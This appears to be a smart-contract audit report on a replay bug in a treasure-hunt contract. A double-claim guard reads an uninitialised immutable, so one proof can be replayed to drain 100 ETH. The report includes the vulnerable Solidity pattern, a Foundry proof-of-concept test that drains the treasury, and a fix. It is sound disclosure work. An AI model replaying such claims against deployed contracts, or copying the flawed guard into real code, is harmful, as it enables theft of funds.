Normal behaviour: claim() should pay out a REWARD of 10 ETH to recipient exactly once per unique treasureHash, enforced by the claimed mapping. After MAX_TREASURES = 10 distinct claims the hunt is over.
Specific issue: the anti-double-claim guard reads the contract-level immutable _treasureHash, which is declared but never initialised (line 35), instead of the user-supplied function parameter treasureHash. The immutable resolves to bytes32(0) forever, so claimed[_treasureHash] always reads claimed[0x0] — a slot that is never written by any realistic claim. The guard never fires, and the same (proof, treasureHash, recipient) tuple can be replayed up to 10 times, draining the full 100 ETH treasury with a single valid ZK proof.
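A minimal sketch of the vulnerable pattern described above (identifiers other than claim/claimed/treasureHash/_treasureHash/AlreadyClaimed/REWARD are assumed; the real contract's proof verification is elided):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.21; // >=0.8.21 allows an immutable to stay uninitialised (defaults to zero)

contract TreasureHuntSketch {
    error AlreadyClaimed(bytes32 treasureHash);

    uint256 public constant REWARD = 10 ether;
    bytes32 private immutable _treasureHash; // declared, never assigned -> always bytes32(0)
    mapping(bytes32 => bool) public claimed;

    function claim(bytes calldata proof, bytes32 treasureHash, address recipient) external {
        // BUG: the guard keys on the zero-valued immutable, not the parameter,
        // so every call checks claimed[0x0] and the guard never fires.
        if (claimed[_treasureHash]) revert AlreadyClaimed(treasureHash);

        // ... ZK proof verification elided ...

        // The write, by contrast, uses the parameter, so claimed[0x0] is never set.
        claimed[treasureHash] = true;
        (bool ok,) = recipient.call{value: REWARD}("");
        require(ok);
    }
}
```

Note that Solidity only permits a never-assigned immutable from 0.8.21 onward; on earlier compilers the declaration would not compile, which is consistent with this bug surviving into a modern codebase unnoticed.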
Likelihood:
The claimer controls all three inputs (proof, treasureHash, recipient) and can simply re-send the same calldata — no additional skill, capital, or timing required.
Anyone observing a successful claim tx on-chain (or in the mempool) can copy the exact calldata and replay it unchanged; the proof already binds a valid non-owner / non-claimer recipient, so no modification is needed.
Impact:
Full loss of the 100 ETH treasury (10 replays × 10 ETH reward) from a single valid proof.
Permanent DoS of the remaining 9 treasures: claimsCount saturates at MAX_TREASURES, so legitimate treasure finders can never claim again — even if the owner re-funds the contract.
Self-contained Foundry test using a stubbed MockAcceptVerifier (returns true for any proof — models the attacker having already obtained one valid proof; identical dynamics with the real Barretenberg verifier):
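A sketch of that test, assuming a `TreasureHunt(address verifier)` constructor, a `verify(bytes, bytes32[])` verifier interface, and the import path shown; adapt these to the actual codebase:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.21;

import {Test} from "forge-std/Test.sol";
// import {TreasureHunt} from "src/TreasureHunt.sol"; // path assumed

contract MockAcceptVerifier {
    // Accepts any proof — models the attacker already holding one valid proof.
    function verify(bytes calldata, bytes32[] calldata) external pure returns (bool) {
        return true;
    }
}

contract ReplayDrainTest is Test {
    TreasureHunt internal hunt;
    address internal finder;

    function setUp() public {
        finder = makeAddr("finder");
        hunt = new TreasureHunt(address(new MockAcceptVerifier()));
        vm.deal(address(hunt), 100 ether); // fund the full treasury
    }

    function test_SameProofReplayedTenTimesDrainsTreasury() public {
        bytes memory proof = hex"deadbeef"; // any bytes: the mock accepts it
        bytes32 th = keccak256("treasure-1");

        for (uint256 i = 0; i < 10; i++) {
            // identical calldata every iteration — the broken guard never reverts
            hunt.claim(proof, th, finder);
        }

        assertEq(finder.balance, 100 ether); // whole treasury drained

        // the other 9 treasures are permanently DoS'd: claimsCount == MAX_TREASURES
        vm.expectRevert();
        hunt.claim(proof, keccak256("treasure-2"), finder);
    }
}
```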
Output:
Remove the unused immutable entirely (it serves no purpose) and make the guard read the function parameter. After the fix, a second call with the same treasureHash reverts with AlreadyClaimed(treasureHash) as intended.
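Sketched as a diff against the vulnerable contract (surrounding code per the report's description):

```diff
-    bytes32 private immutable _treasureHash; // unused, always bytes32(0) — delete
@@
-        if (claimed[_treasureHash]) revert AlreadyClaimed(treasureHash);
+        if (claimed[treasureHash]) revert AlreadyClaimed(treasureHash);
```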